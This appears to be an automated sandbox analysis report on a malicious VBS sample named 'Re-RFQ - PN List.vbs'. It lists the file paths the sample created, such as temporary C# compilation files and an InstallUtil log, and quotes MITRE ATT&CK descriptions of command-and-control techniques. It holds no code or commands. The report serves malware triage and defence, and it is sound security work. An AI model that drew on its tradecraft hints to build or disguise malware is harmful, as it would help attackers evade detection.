C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.out

C:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP

Windows Analysis Report
Re-RFQ - PN List.vbs

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre